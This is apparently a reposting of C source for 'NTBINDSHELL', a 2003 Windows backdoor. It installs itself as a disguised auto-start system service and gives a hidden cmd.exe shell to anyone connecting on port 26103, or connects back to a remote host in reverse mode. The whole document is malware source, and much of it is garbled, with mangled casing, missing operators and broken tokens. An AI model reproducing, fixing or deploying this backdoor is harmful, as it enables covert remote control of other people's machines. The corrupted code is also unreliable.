NTBINDSHELL source sharing / *
*
Win32
Rootkit - cmd.exe Remote Shell Backdoor
* (c) 2003 Christophe Devine <
Devine@cr0.net>
* Distributed for educational purposes online
*
* Before Running NTBINDSHELL.EXE, RENAME IT TO
* "RSMSS.EXE" and copy it INTO% WINDIR% / system32.
* This Program Will Automatically Register Itself
* AS A System Service The First Time It Is Run,
* Provided it has the required privileges.
*
* To Remove the service, Start Regedit and Delete
* HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET /
* Services / RSMSS, Then Reboot The Computer.
*
* Backdoor USAGE:
*
* Normal (Listen) Mode: rsmss
* Reverse-Connect Mode: rsmss
* /
#include
#define default_port 26103
Char service [] = "rsmss"; char displayName [] = "Remote Services Manager";
Int argc; char * argv [8];
Void WinApi Handler (DWord FDWControl) {if (fdwcontrol == service_control_shutdown) {EXITPROCESS (0);}}
Void WinAPI Servicemain (DWORD DWARGC, LPTSTR * LPSZARGV) {StartupInfo sinfo; process_information pinfo; service_status_handle sth; service_status status; wsadata wsadata;
Unsigned char buffer [4096]; struct hostent * client_host; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int server_sock, client_sock, n; unsigned short int port;
Sth = registerServiceCtrlHandler (ServiceName, Handler);
MEMSET (& status, 0, sizeof (service_status));
STATUS.DWSERVICETYPE = service_win32_oen_process; status.dwcurrentState = service_running; status.dwcontrolsaccepted = service_accept_shutdown; status.dwwin32exitcode = no_error;
SetServiceStatus (Sth, & status);
Port = default_port; if (argc> 1) {if (! (port = ATOI (argv [1]))) {port = default_port;}}
IF (WsaStartup (MakeWord (2,0), & WSADATA) {Return;}
IF (Argc <3) {if (! (Server_Sock = WSASSOCKET (AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0))) {Return;}
n = sizeof (server_addr);
MEMSET (& Server_ADDR, 0, N);
Server_addr.sin_addr.s_addr = htonl (inaddr_any); server_addr.sin_family = AF_INET; Server_Addr.sin_Port = HTONS (port);
IF ((Bind (Server_Sock, (const struct socketdr *) & server_addr, n))))) {Return;}
IF (Listen (Server_Sock, 10)) {return;}}
While (1) {n = sizeof (client_addr);
IF (argc <3) {IF (! (CLIENT_SOCK = Accept (Server_Sock, (Struct SockAddr *) & Client_addr, & n))) {Continue;}} else {Sleep (10000);
IF (! (CLIENT_HOST = gethostByname))) {Continue;
MEMSET (& Client_Addr, 0, N);
Memcpy (void *) & client_addr.sin_addr, (void *) Client_host-> h_addr, client_host-> h_length;
Client_addr.sin_family = af_INET; client_addr.sin_port = htons (port);
IF (! (CLIENT_SOCK = WSASOCKET (AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0))) {Continue;
IF (Connect (Client_Sock, (Struct SockAddr *) & Client_Addr, N))) {Continue;}}
GetStartupinfo (& SINFO);
sinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; sinfo.wShowWindow = SW_HIDE; sinfo.hStdInput = (void *) client_sock; sinfo.hStdOutput = (void *) client_sock; sinfo.hStdError = (void *) client_sock;
GetsystemDirectory (buffer, max_path);
n = strlen (buffer);
Buffer [n] = '//'; buffer [n 5] = 'e'; buffer [n 1] = 'c'; buffer [n 6] = 'x'; buffer [n 2] = 'm'; buffer [n 7] = 'E'; buffer [n 3] = 'd'; buffer [n 8] = '/ 0'; buffer [n 4] = '.'; setCurrentDirectory ("//");
IF (! CreateProcess (Buffer, Null, Null, Null, True, Create_New_Console, Null, Null, & Sinfo, & Pinfo) {Shutdown (Client_Sock, 2); Continue;}
CloseSocket (Client_sock);}}
Int WinApi Winmain (Hinstance Hinstance, Hinstance Hprevinstance, LPSTR LPCMDLINE, INT NCMDSHOW) {SC_HANDLE SC1, SC2;
Service_table_entry ste [2] = {{{servicename, servicemain}, {null, null}}
Unsigned char * c = getcommandline ();
if (sc1 = OpenSCManager (NULL, NULL, SC_MANAGER_ALL_ACCESS)) {if (sc2 = OpenService (sc1, ServiceName, SERVICE_START)) {CloseServiceHandle (sc2);} else {if (GetLastError () == ERROR_SERVICE_DOES_NOT_EXIST) {sc2 = CreateService ( SC1, ServiceName, DisplayName, Service_all_Access, Service_WIN32_OWN_PROCESS, Service_Auto_Start, Service_ERROR_IGNORE, C, NULL, NULL, NULL, NULL, NULL
IF (SC2! = null) {StartService (SC2, 0, NULL); ClosESERVICEHANDLE (SC2); ClosESERVICEHANDLE (SC1); Return (0);}}}}
ClosESERVICEHANDLE (SC1);
Argc = 0;
While (1) {while (Isspace (* c)) C ;
IF (* c == '/ 0') Break;
Argv [Argc ] = C;
IF (* C == '") {while (* c! ='") IF (* C == '/ 0') goto argv_done; c ;} else {while (! issspace (* c)) IF (* C == '/ 0') goto argv_done;}
* C = '/ 0';}
Argv_done:
IF (! StartServiceCtrldispatcher (ste)) {servicemain (0, null);
Return (1);
